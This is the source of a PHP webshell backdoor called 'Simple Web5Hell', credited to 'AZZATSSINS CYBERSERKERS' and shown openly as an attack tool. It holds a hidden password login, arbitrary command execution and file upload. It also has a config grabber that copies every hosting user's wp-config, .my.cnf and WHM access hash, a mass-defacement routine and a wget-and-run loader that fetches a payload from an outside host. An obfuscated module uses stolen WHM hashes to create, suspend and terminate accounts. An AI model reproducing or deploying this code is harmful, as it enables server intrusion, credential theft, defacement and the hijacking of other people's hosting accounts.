SIMPLE WEBSHELL BACKDOOR V2,8

1. <?php
2. /*
3. Simple Web5Hell Linux/Unix By © AZZATSSINS CYBERSERKERS
4. Login Page: ?god=damn
5. Default Password: A/Z
6. */
7. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
8. $color = "#00ff00";
9. $default_action = 'FilesMan';
10. @define('SELF_PATH', __FILE__);
11. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
12. header('HTTP/1.0 AZZATSSINS');
13. exit;
14. }
15. @session_start();
16. @error_reporting(0);
17. @ini_set('error_log',NULL);
18. @ini_set('log_errors',0);
19. @ini_set('max_execution_time',0);
20. @ini_set('display_errors', 0);
21. @set_time_limit(0);
22. @set_magic_quotes_runtime(0);
23. @define('VERSION', '2.1');
24. if( get_magic_quotes_gpc() ) {
25. function stripslashes_array($array) {
26. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
27. }
28. $_POST = stripslashes_array($_POST);
29. }
30. function echoLogin() {
31. header('HTTP/1.0 404 Not Found');
32. if($_GET['god']=="damn"){
33. echo'<style>
34. input { margin:0;background-color:#fff;border:1px solid #fff; }
35. </style>
36. <center>
37. <input type=password name=lol><br>
38. <input type=password name=lol><br>
39. <input type=password name=lol><br>
40. <input type=password name=lol><br>
41. <form method=post>
42. <input type=password name=pass>
43. </form><br>
44. <input type=password name=lol><br>
45. <input type=password name=lol><br>
46. <input type=password name=lol><br>
47. <input type=password name=lol><br>
48. </center>';
49. }
50. exit;
51. }
52. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
53. if( empty( $auth_pass ) ||
54. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
55. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
56. else
57. echoLogin();
58.  
59. @error_reporting(0);
60. @ini_set('output_buffering',0);
61. @ini_set('display_errors', 0);
62. @ini_set('log_errors',0);
63. /*
64. SIMPLE WEB5HELL V1
65. Script Edited By AZZATSSINS CYBERSERKERS (Editor/Author)
66. Email : Cyberserkers@gmail.com
67. Twitter : @AZZATSSINS
68. Facebook: /AZZATSSINS.CYBERSERKERS
69. VK: /azzatssins
70. Dont Change ©Author/Editor® ^_^
71. */
72. echo "<title>SIMPLE WEB5HELL</title><body bgcolor=silver><center><br><div style='background:#d400f4;margin:0px;padding:26px;text-align:center;color:#202020;'><b><i><div style='background:red;margin:0px;padding:8px;text-align:center;color:white;'>[<a href='?'>HOME</a>] [<a href='?whmcs=decode'>WHMCS DECODER</a>] [<a href='?WHMCS=REMOTE'>WHMCS REMOTE</a>] [<a href='?reseller=grabber'>RESELLER</a>] [<a href='?whmcs=scan'>WHMCS SCANNER</a>] [<a href='?whmcs=shell'>WHMCS INJECT</a>] [<a href='?whmcs=client'>WHMCS CLIENT</a>] [<a href='?ceck=whmcs'>WHMCS CECK</a>] [<a href='?whmcs=token'>BYPASS TOKEN</a>] [<a href='?AZZATSSINS=CONFIGRABBER'>CONFIG</a>]</div><br><div style='background:silver;margin:0px;padding:10px;text-align:center;color:red;'>[<a href='?AZZATSSINS=encrypt'>ENCRYPTIONS</a>] [<a href='?md5=decrypter'>DECRYPTIONS</a>] [<a href='?open=ports'>OPEN PORT</a>] [<a href='?jo=wp'>JOWP</a>] [<a href='?AZZATSSINS=JPASS'>JOOMLA LOGIN</a>] [<a href='?AZZATSSINS=WPASS'>WORDPRESS LOGIN</a>] [<a href='?traindt=login'>TRAINDT LOGIN</a>] [<a href='?nuke=login'>NUKE LOGIN</a>] [<a href='?AZZATSSINS=BOMAIL'>BOMAIL</a>] [<a href='?mas=mailer'>MAILER</a>]</div><br><div style='background:lime;margin:0px;padding:10px;text-align:center;color:#202020;'><form method='POST'><input type='submit' name='azzatssins1' value='CONFIG'> <input type='submit' name='azzatssins' value='WHMCS DECODE'> <input type='submit' name='azzatssins2' value='JUMPING'> <input type='submit' name='azzatssins3' value='SYMLINK 01'> <input type='submit' name='azzatssins4' value='SYMLINK 02'> <input type='submit' name='azzatssins5' value='BYPASS FUN'> <input type='submit' name='azzatssins6' value='MYSQL'> <input type='submit' name='azzatssins7' value='SERVER VULN'> <input type='submit' name='azzatssins9' value='MASSDEFACE'> <input type='submit' name='azzatssins8' value='HIDE UR ASS'></i></b><br></form></div>";
73. $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
74. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
75.  
76. $UName = `uname -a`;
77. $SCWD = `pwd`;
78. $UserID = `id`;
79.  
80. if( $currentWD == "" ) {
81. $currentWD = $SCWD;
82. }
83.  
84.  
85. if( $_POST['_act'] == "List files!" ) {
86. $currentCMD = "ls -la";
87. }
88.  
89. echo "<div style='background:orange;margin:0px;padding:26px;text-align:center;color:#202020;'><br><form method=post enctype=\"multipart/form-data\"><table>";
90.  
91. echo "<tr><td><b>Execute command:</b></td><td><input size=30 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
92. echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
93.  
94. echo "<tr><td><b>Change directory:</b></td><td><input size=30 name=\"_cwd\" value=\"".$currentWD."\"></td>";
95. echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
96.  
97. echo "<tr><td><b>Upload file:</b></td><td><input size=15 type=file name=_upl></td>";
98. echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
99.  
100. echo "</table></form>";
101. echo"</div><br><br></div></center>";
102.  
103. if($_POST['azzatssins9']){
104. ?>
105. <br><center><b><i><form ENCTYPE="multipart/form-data" method=post>
106. Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
107. <br>
108. Nama File : <input typ=text name=file size=20 value="index.htm">
109. <br>URL Script :
110. <input typ=text name=url size=30 value="http://wget.yu.tl/files/lol.css">
111. <br>
112. <input type=submit value=Deface>
113. </form></i></b></center>
114. <?php
115. $path=$_POST[path];
116. $file=$_POST[file];
117. $script=$_POST[url];
118. $dir=opendir("$path");
119. while($row=readdir($dir))
120. {
121. $start=@fopen("$row/$file","w+");
122. $code=@file_get_contents($script);
123. $finish=@fwrite($start,$code);
124. if ($finish)
125. {
126. echo "$row/$file > Done<br><br>";
127. }
128. } /*MassDeface by AZZATSSINS*/
129. }
130. if($_POST['azzatssins']){
131. system('wget www.wget.yu.tl/files/wd.css');system('mv wd.css wd.php'); echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';
132. }
133. if($_POST['azzatssins1']){
134. /*Config Grabber By AZZATSSINS CYBERSERKERS*/
135. //$us = file_get_contents("/etc/passwd");
136. $usa = fopen('/etc/passwd','r');
137. $dir = mkdir('AZZATSSINS', 0777);
138. $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
139. $frr = fopen('AZZATSSINS/.htaccess', 'w');
140. fwrite($frr, $rrrr);
141. while($us = fgets($usa)){
142. if($us==""){
143. echo "<font color=red>can't read /etc/passwd</font>";
144. }
145. else{
146. preg_match_all('/(.*?):x:/', $us, $user_byk);
147. foreach($user_byk[1] as $user){
148. $dir1 = "/home/$user/public_html/";
149. if(is_readable($dir1)){
150.  
151. system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS-azzatssins.txt');
152. system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS-azzatssins.txt');
153. system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC-azzatssins.txt');
154. system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP-azzatssins.txt');
155. system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM-azzatssins.txt');
156. }
157. else{
158. }
159. }
160. }
161.  
162. } system('rm AZZATSSINS/.htaccess');
163.  
164. echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; }
165.  
166. if($_GET['WHMCS']=="REMOTE"){
167. $emailente = 'cyberserkers@gmail.com';
168. $nama = 'azzatssins';
169. $ {
170. "GLOBALS"
171. }
172. ["rshhhhzdjivn"] = "hostname";
173. $ {
174. "GLOBALS"
175. }
176. ["qybmmyvo"] = "dm5";
177. $ {
178. "GLOBALS"
179. }
180. ["cgdqizbjb"] = "infomail";
181. $ {
182. "GLOBALS"
183. }
184. ["ugwdatuetm"] = "httpheaders";
185. $ {
186. "GLOBALS"
187. }
188. ["jmossxbfynir"] = "frommail";
189. $ {
190. "GLOBALS"
191. }
192. ["buubgbf"] = "tomail";
193. $ {
194. "GLOBALS"
195. }
196. ["tfoqdtkoozl"] = "httpheader";
197. $ {
198. "GLOBALS"
199. }
200. ["gkfjmmp"] = "info";
201. $ {
202. "GLOBALS"
203. }
204. ["htlxwjkdfnbx"] = "subject";
205. $ {
206. "GLOBALS"
207. }
208. ["wyuvccqfyby"] = "emailente";
209. $ {
210. "GLOBALS"
211. }
212. ["yhcbrtqybhn"] = "tujuan";
213. $ {
214. "GLOBALS"
215. }
216. ["epyufhqui"] = "sep";
217. $ {
218. "GLOBALS"
219. }
220. ["klnlsxvu"] = "dm1";
221. $ {
222. "GLOBALS"
223. }
224. ["mgzcndyuozix"] = "dm4";
225. $ {
226. "GLOBALS"
227. }
228. ["bgyfsievqc"] = "dm3";
229. $ {
230. "GLOBALS"
231. }
232. ["cnpybqg"] = "dm2";
233. $ {
234. "GLOBALS"
235. }
236. ["cemjvape"] = "II11II11II11II11";
237. $ {
238. "GLOBALS"
239. }
240. ["tttkddsbp"] = "version";
241. $ {
242. "GLOBALS"
243. }
244. ["jqstuo"] = "bawah";
245. $ {
246. "GLOBALS"
247. }
248. ["rrbcihfi"] = "separator";
249. $ {
250. "GLOBALS"
251. }
252. ["lqfwxtwbjz"] = "hash";
253. $ {
254. "GLOBALS"
255. }
256. ["cntvmeburrl"] = "virgous";
257. $ {
258. "GLOBALS"
259. }
260. ["ejmlkkd"] = "i";
261. $ {
262. "GLOBALS"
263. }
264. ["rwocuxf"] = "result";
265. $ {
266. "GLOBALS"
267. }
268. ["sxeebm"] = "item";
269. $ {
270. "GLOBALS"
271. }
272. ["ppujmk"] = "element";
273. $ {
274. "GLOBALS"
275. }
276. ["kwsayld"] = "list";
277. $ {
278. "GLOBALS"
279. }
280. ["sqbtmnd"] = "xml";
281. $ {
282. "GLOBALS"
283. }
284. ["zmibinpgipr"] = "xmlstr";
285. $ {
286. "GLOBALS"
287. }
288. ["ltwtigrphxuo"] = "rawResult";
289. $ {
290. "GLOBALS"
291. }
292. ["nsqdbsct"] = "header";
293. $ {
294. "GLOBALS"
295. }
296. ["fughgfkrc"] = "api_path";
297. $ {
298. "GLOBALS"
299. }
300. ["xiykwn"] = "errstr";
301. $ {
302. "GLOBALS"
303. }
304. ["lvnrwks"] = "accessHash";
305. $ {
306. "GLOBALS"
307. }
308. ["gueuhqn"] = "user";
309. ?>
310.  
311. <html>
312. <head>
313. <title>WHM Remote Access</title>
314. <meta name="description" content="remote access whm" />
315. <meta name="description" content="accesswhmusingxmlapi" />
316. <meta name="keywords" content="remoteaccesswhm"/>
317. <meta name="keywords"content = "access whm using xml api"/>
318. </head>
319. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
320. <STYLE>
321. textarea{
322. BORDER: dashed 1px blue;
323. BORDER-COLOR: blue;
324. background-image: url('http://i.imgur.com/zHNCk2e.gif');
325. font: 5pt Verdana;
326. color: lime;
327. font-weight:bold;
328. font-family: Tahoma;
329. }
330. body {
331. font-family: Tahoma
332. }
333. tr {
334. BORDER: dashed 1px #333;
335. font: 5pt Verdana;
336. color: #FFF;
337. }
338. td {
339. BORDER: dashed 1px #333;
340. font: 5pt Verdana;
341. color: #FFF;
342. }
343.  
344. .tr2 {
345. BORDER: dashed 1px blue;
346. background-color: black;
347. font: 5pt Verdana;
348. color: #FFF;
349. }
350. .td2 {
351. BORDER: dashed 1px blue;
352. background-color: black;
353. font: 5pt Verdana;
354. color: #FFF;
355. }
356.  
357. hr {
358. BORDER: dashed 1px blue;
359. color: #FFF;
360. }
361. .table1 {
362. BORDER: 0px Black;
363. BACKGROUND-COLOR: Black;
364. font: 5pt Verdana;
365. color: #FFF;
366. }
367. .td1 {
368. BORDER: 0px;
369. BORDER-COLOR: #333333;
370. font: 5pt Verdana;
371. color: white;
372. }
373. .tr1 {
374. BORDER: 0px;
375. BORDER-COLOR: #333333;
376. font: 5pt Verdana;
377. color: #FFF;
378. }
379. table {
380. BORDER: dashed 2px blue;
381. BORDER-COLOR: blue;
382. font: 5pt Verdana;
383. color: #FFF;
384. }
385. input {
386. border : dashed 1px;
387. border-color : blue;
388. BACKGROUND-COLOR: Black;
389. font: 5pt Verdana;
390. color: white;
391. }
392. select {
393. BORDER-RIGHT: Black 1px solid;
394. BORDER-TOP: #DF0000 1px solid;
395. BORDER-LEFT: #DF0000 1px solid;
396. BORDER-BOTTOM: Black 1px solid;
397. BORDER-color: #FFF;
398. BACKGROUND-COLOR: Black;
399. font: 5pt Verdana;
400. color: white;
401. }
402. submit {
403. BORDER: buttonhighlight 2px outset;
404. BACKGROUND-COLOR: Black;
405. width: 30%;
406. font: 5pt Verdana;
407. color: #FFF;
408. }
409. BODY {
410. SCROLLBAR-FACE-COLOR: Black;
411. SCROLLBAR-HIGHLIGHT-color: #FFF;
412. SCROLLBAR-SHADOW-color: #FFF;
413. SCROLLBAR-3DLIGHT-color: #FFF;
414. SCROLLBAR-ARROW-COLOR: Black;
415. SCROLLBAR-TRACK-color: #FFF;
416. SCROLLBAR-DARKSHADOW-color: #FFF
417. margin: 1px;
418. color: Red;
419. background-color: Black;
420. }
421. .main {
422. margin: -287px 0px 0px -490px;
423. BORDER: dashed 1px #333;
424. BORDER-COLOR: #333333;
425. }
426.  
427. .inputzbut{
428. background-color:black;
429. font: 5pt Verdana;
430. color:white;
431. margin:0px;
432. colspan:0px;
433. border:1px solid #444444;
434. border-bottom:1px solid blue;
435. border-top:1px solid blue;
436. border-right:1px solid blue;
437. border-left:1px solid blue;
438. }
439.  
440. .input2{
441. background-color: black;
442. color:white;
443. font: 5pt Verdana;
444. border:0px solid #444444;
445. border-bottom:0px solid blue;
446. border-top:0px solid blue;
447. border-right:0px solid blue;
448. border-left:0px solid blue;
449. }
450. .areazbut{
451. background: black;
452. font: 5pt Verdana;
453. color:white;
454. margin:0 4px;
455. border:1px solid #444444;
456. border-bottom:1px solid blue;
457. border-top:1px solid blue;
458. border-right:1px solid blue;
459. border-left:1px solid blue;
460. }
461.  
462. .tt {
463. background-color: Black;
464. }
465. .areaz {
466. margin:auto;
467. border:1px solid blue;
468. width:80%;
469. height:180px;
470. background:#000000;
471. padding:0 2px;
472. }
473. .areas {
474. margin:auto;
475. border:1px solid blue;
476. width:100%;
477. height:220px;
478. background:#000000;
479. padding:0 2px;
480. }
481. A.su {
482. color: white;
483. }
484. A.su:link {
485. text-decoration: none;
486. color:red;
487. }
488. A.su:visited {
489. text-decoration: none;
490. color: red;
491. }
492. A.su:hover {
493. text-decoration: underline;
494. color: red;
495. }
496. A.su:active {
497. text-decoration: none;
498. color: red;
499. }
500. A.asu {
501. color:yellow;
502. }
503. A.asu:link {
504. text-decoration: none;
505. color:yellow;
506. }
507. A.asu:visited {
508. text-decoration: none;
509. color:yellow;
510. }
511. A.asu:hover {
512. text-decoration: underline;
513. color:yellow;
514. }
515. A.asu:active {
516. text-decoration: none;
517. color: yellow;
518. }
519. A.asuu {
520. color:lime;
521. }
522. A.asuu:link {
523. text-decoration: none;
524. color:lime;
525. }
526. A.asuu:visited {
527. text-decoration: none;
528. color:lime;
529. }
530. A.asuu:hover {
531. text-decoration: underline;
532. color:lime;
533. }
534. A.asuu:active {
535. text-decoration: none;
536. color:lime;
537. }
538. A:link {
539. COLOR: White;
540. TEXT-DECORATION: none
541. }
542. A:visited {
543. COLOR: White;
544. TEXT-DECORATION: none
545. }
546. A:hover {
547. color: Red;
548. TEXT-DECORATION: none
549. }
550. A:active {
551. color: Red;
552. TEXT-DECORATION: none
553. }
554. #result{margin:10px;}
555. #result span{display:block;}
556. #result .X{background-color:#101010;}
557. #result .Y{background-color:green;}
558. #result .Z{background-color:red;}
559. a { text-decoration:none; }
560. a:hover{ border-bottom:2px solid red; }
561.  
562. *{ color:white; }
563.  
564. #menu{ background:#111111;margin:8px 2px 4px 2px; }
565.  
566. #menu a{ padding:4px 18px;
567. margin:0;
568. background:#black;
569. text-decoration:none;
570. letter-spacing:2px;
571. border-radius: 4px;
572. border-bottom:2px solid #444444;
573. border-top:2px solid #444444;
574. border-right:2px solid lime;
575. border-left:2px solid lime;
576. }
577.  
578. #menu a:hover{
579. background:#191919;
580. border-radius: 7px;
581. border-bottom:2px solid #white;
582. border-top:2px solid #white;
583. border-right:2px solid #FF0000;
584. border-left:2px solid #FF0000;
585. }
586.  
587.  
588.  
589. .main { width:90%;
590. background:#000000;
591. margin:30px auto 10px;
592. padding:10px 10px 5px 10px;
593. border-radius:5px;
594. -moz-border-radius:5px;
595. -moz-box-shadow:0px 0px 10px #FFFFFF;
596. }
597.  
598. .output { margin:auto;
599. border:1px solid red;
600. width:100%;
601. height:400px;
602. background:#000000;
603. padding:0 2px; }
604.  
605.  
606. .b1{
607. font-size:30px;padding:0;color:white;
608. }
609. .b2{
610. font-size:40px;padding:0;color:red;
611. }
612. .b3{
613. font-size:20px;padding:0;color:#444444;
614. }
615.  
616. .info{ background:#111111;
617. width:99%;
618. padding:5px;
619. margin:10px auto 5px;
620. text-align:center;
621. font-size:13px;}
622. .info a{ font-size:14px;}
623. .info span{ font-size:14px;}
624. .jaya{ margin:5px; text-align:right; }
625. </style>
626. </td></table></tr>
627. </head>
628. <center>
629. <table border="1" width="100%"><tbody>
630. <td>
631. <center><p>
632. <form method="GET">
633. <input style="border : dashed 0px;"type="submit" name="azzatssins" value="WHM REMOTE ACCESS" id="button">
634. </form>
635. <form method="post" name="pageform" action="" onsubmit="return validate(this);">
636. <p>
637. <textarea rows="15" cols="38" name="vhash"></textarea>
638. <p>
639. <table border="1">
640. <tr>
641. <td align="center">
642. Host Name
643. </td>
644. <td align="center">
645. WHM Owner
646. </td></tr>
647. <td align="center">
648. <input name="vhost" type="text" size="25" value=""></td>
649. <td align="center">
650. <input name="vuser" type="text"size="25" value="">
651. </td></tr>
652. <td colspan="2" align="center">
653. <input name="azzatssins1" type="submit" value=" Info Hostname - WHM Version - Account - Package"></td></tr></table>
654. </center>
655. <br />
656. </td>
657. <td align="center"><br />
658.  
659.  
660. <input type="submit" name="v2" value="Create Account" id="button"><br /><br/>
661. <input type="submit" name="v3" value="Account Sumarry" id="button"><br /><br />
662. <input type="submit" name="v4" value="Change Password" id="button"><br /><br />
663. <input type="submit" name="v5" value="Suspend Account" id="button"><br /><br />
664. <input type="submit"name="v6" value="Unsuspend Account" id="button"><br /><br />
665. <input type="submit" name="v7" value="Terminate Account" id="button"><br /><br />
666.  
667. </td>
668. </tr>
669. </form></tbody></table>
670. <table border="1" width="100%">
671. <tr><td align="center">
672. <!-- start xml api -->
673.  
674. <?php
675. set_time_limit(1);error_reporting(1);ini_set("memory_limit","64M");header("Content-Type: text/html; charset=UTF-8");class Whm{var$controller=true;var$host=null;var$user=null;var$accessHash=null;var$errors=array();var$fp=null;function startup(&$controller){${"GLOBALS"}["bjabneswp"]="controller";$this->controller=&${${"GLOBALS"}["bjabneswp"]};}function init($host,$user,$accessHash){$this->host=$host;$this->user=${${"GLOBALS"}["gueuhqn"]};${${"GLOBALS"}["lvnrwks"]}=str_replace(array("
676. ","
677. "),"",${${"GLOBALS"}["lvnrwks"]});$this->accessHash=${${"GLOBALS"}["lvnrwks"]};}function connect($api_path){$pwrwkxx="errstr";$jxjnjhhffhhg="errno";$mobgrxe="errno";$ocsywwsfh="header";${"GLOBALS"}["npulqtw"]="header";$this->fp=fsockopen("ssl://".$this->host,2087,${$jxjnjhhffhhg},${$pwrwkxx},30);if(${$mobgrxe}==0&&$this->fp==false){$this->errors[]="Socket Error: Could not initialize socket.";return false;}elseif($this->fp==false){${"GLOBALS"}["ydhija"]="errno";$this->errors[]="Socket Error #".${${"GLOBALS"}["ydhija"]}.": ".${${"GLOBALS"}["xiykwn"]};return false;}$lirchk="header";$ikxgyddec="header";${$ikxgyddec}="";${$ocsywwsfh}.="GET ".${${"GLOBALS"}["fughgfkrc"]}." HTTP/1.0
678. ";${${"GLOBALS"}["nsqdbsct"]}.="Host: ".$this->host."
679. ";${$lirchk}.="Connection: Close
680. ";${${"GLOBALS"}["nsqdbsct"]}.="Authorization: WHM ".$this->user.":".$this->accessHash."
681. ";${${"GLOBALS"}["npulqtw"]}.="
682. ";if(!@fputs($this->fp,${${"GLOBALS"}["nsqdbsct"]})){$this->errors[]="Unable to send header.";return false;}}function disconnect(){fclose($this->fp);}function getOutput(){$bwnxdryfqk="result";${"GLOBALS"}["bcgmchpujiui"]="rawResult";${"GLOBALS"}["pbiqulfirt"]="rawResultParts";$lukxqqrie="result";$umsdbbq="rawResult";${${"GLOBALS"}["bcgmchpujiui"]}="";${"GLOBALS"}["xxtvnpe"]="rawResultParts";while(!feof($this->fp)){${${"GLOBALS"}["ltwtigrphxuo"]}.=@fgets($this->fp,128);}${${"GLOBALS"}["xxtvnpe"]}=explode("
683.  
684. ",${$umsdbbq});${$lukxqqrie}=${${"GLOBALS"}["pbiqulfirt"]}[1];return${$bwnxdryfqk};}function version(){$this->connect("/xml-api/version");${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});return$xml->version;}function gethostname(){$frzbhexw="xmlstr";$this->connect("/xml-api/gethostname");$mttfht="xmlstr";${$mttfht}=$this->getOutput();$kbewsugpk="xml";$hdcaeudhj="xmlstr";if(${$hdcaeudhj}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$kbewsugpk}=new SimpleXMLElement(${$frzbhexw});return$xml->hostname;}function listaccts(){${"GLOBALS"}["crvwckqlxh"]="xmlstr";$this->connect("/xml-api/listaccts");${"GLOBALS"}["wcrfjl"]="list";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();$eqksyigyu="xmlstr";$gsrvsafam="i";if(${${"GLOBALS"}["crvwckqlxh"]}==""){$this->errors[]="No output.";return false;}$sjwtvwj="list";$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new DOMDocument();$xml->loadXML(${$eqksyigyu});${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("user");${$gsrvsafam}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["user"]=$item->nodeValue;$xptvqyyhz="i";${$xptvqyyhz}++;}}$mhlrnwepg="element";${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("domain");${"GLOBALS"}["dkbptovxc"]="i";${${"GLOBALS"}["dkbptovxc"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["gnijdvt"]="i";$vnmpqxit="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["gnijdvt"]}]["domain"]=$item->nodeValue;${$vnmpqxit}++;}}${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("plan");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){$kgpxaihbbt="item";foreach($element->childNodes AS${$kgpxaihbbt}){$gznkditpwjv="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["package"]=$item->nodeValue;${$gznkditpwjv}++;}}${$sjwtvwj}=$xml->getElementsByTagName("unix_startdate");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["wcrfjl"]} AS${$mhlrnwepg}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["jnspmcrgop"]="i";$fdsrmhfo="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["jnspmcrgop"]}]["start_date"]=$item->nodeValue;${$fdsrmhfo}++;}}return${${"GLOBALS"}["rwocuxf"]};}function listPkgs(){$olbumfu="xml";${"GLOBALS"}["bhqjwy"]="xmlstr";$vkvqwmml="list";$this->connect("/xml-api/listpkgs");${"GLOBALS"}["pesngtvb"]="list";$oxhlzbad="element";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["bhqjwy"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$olbumfu}=new DOMDocument();$xml->loadXML(${${"GLOBALS"}["zmibinpgipr"]});${"GLOBALS"}["widejwlmsrbo"]="i";${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("name");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${$oxhlzbad}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["gljaytjur"]="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["gljaytjur"]}]["package_name"]=$item->nodeValue;${${"GLOBALS"}["ejmlkkd"]}++;}}${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("QUOTA");${"GLOBALS"}["oenwrsg"]="element";${${"GLOBALS"}["widejwlmsrbo"]}=0;foreach(${$vkvqwmml} AS${${"GLOBALS"}["oenwrsg"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["uusrhduy"]="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["package_quota"]=$item->nodeValue;${${"GLOBALS"}["uusrhduy"]}++;}}${"GLOBALS"}["vlgvletxhhl"]="list";${${"GLOBALS"}["vlgvletxhhl"]}=$xml->getElementsByTagName("BWLIMIT");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["pesngtvb"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["pspifihvqw"]="result";$inxltlyc="i";${${"GLOBALS"}["pspifihvqw"]}[${$inxltlyc}]["package_bw_limit"]=$item->nodeValue;${${"GLOBALS"}["ejmlkkd"]}++;}}return${${"GLOBALS"}["rwocuxf"]};}function createAccount($acctDomain,$acctUser,$acctPass,$acctPackg){$vnxrfpopyezq="xml";$tybhaauxoko="xmlstr";${"GLOBALS"}["ohdlmvgirrg"]="xmlstr";$this->connect("/xml-api/createacct?username=$acctUser&password=$acctPass&plan=$acctPackg&domain=$acctDomain&ip=n&cgi=y&frontpage=y&cpmod=x3&useregns=1&reseller=1");${$tybhaauxoko}=$this->getOutput();if(${${"GLOBALS"}["ohdlmvgirrg"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$vnxrfpopyezq}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->result->status==1){$mhcvech="result";${"GLOBALS"}["bhvgxqme"]="result";${${"GLOBALS"}["rwocuxf"]}["status"]=$xml->result->status;${$mhcvech}["statusmsg"]=$xml->result->statusmsg;$snkwgpps="result";${${"GLOBALS"}["rwocuxf"]}["ip"]=$xml->result->options->ip;${"GLOBALS"}["ulbbaopz"]="result";${${"GLOBALS"}["rwocuxf"]}["nameserver"]=$xml->result->options->nameserver;${"GLOBALS"}["qtgspvp"]="result";${"GLOBALS"}["lehyuj"]="result";${${"GLOBALS"}["ulbbaopz"]}["nameserver2"]=$xml->result->options->nameserver2;${${"GLOBALS"}["rwocuxf"]}["nameserver3"]=$xml->result->options->nameserver3;${${"GLOBALS"}["lehyuj"]}["nameserver4"]=$xml->result->options->nameserver4;${$snkwgpps}["package"]=$xml->result->options->package;${${"GLOBALS"}["qtgspvp"]}["rawout"]=$xml->result->rawout;return${${"GLOBALS"}["bhvgxqme"]};}else{$this->errors[]=$xml->result->statusmsg;return false;}}function accountsummary($accUser){$this->connect("/xml-api/accountsummary?user=$accUser");$dxoluomgdiq="xmlstr";${$dxoluomgdiq}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->status==1){$wagnskiph="result";$flimtqwawp="result";$nbdwembyxqc="result";$wmetitlano="result";${"GLOBALS"}["xvfubsjlhi"]="result";$pjtlsoucqgw="result";$yofnfnzn="result";${"GLOBALS"}["ucuajwylna"]="result";${${"GLOBALS"}["rwocuxf"]}["disklimit"]=$xml->acct->disklimit;${$yofnfnzn}["diskused"]=$xml->acct->diskused;${${"GLOBALS"}["xvfubsjlhi"]}["diskused"]=$xml->acct->diskused;${${"GLOBALS"}["ucuajwylna"]}["domain"]=$xml->acct->domain;$kshdodvotj="result";$euppkrpbjh="result";${$wmetitlano}["email"]=$xml->acct->email;${${"GLOBALS"}["rwocuxf"]}["ip"]=$xml->acct->ip;${$nbdwembyxqc}["owner"]=$xml->acct->owner;${$kshdodvotj}["partition"]=$xml->acct->partition;${$pjtlsoucqgw}["plan"]=$xml->acct->plan;${$flimtqwawp}["startdate"]=$xml->acct->startdate;${${"GLOBALS"}["rwocuxf"]}["theme"]=$xml->acct->theme;${$wagnskiph}["unix_startdate"]=$xml->acct->unix_startdate;${${"GLOBALS"}["rwocuxf"]}["user"]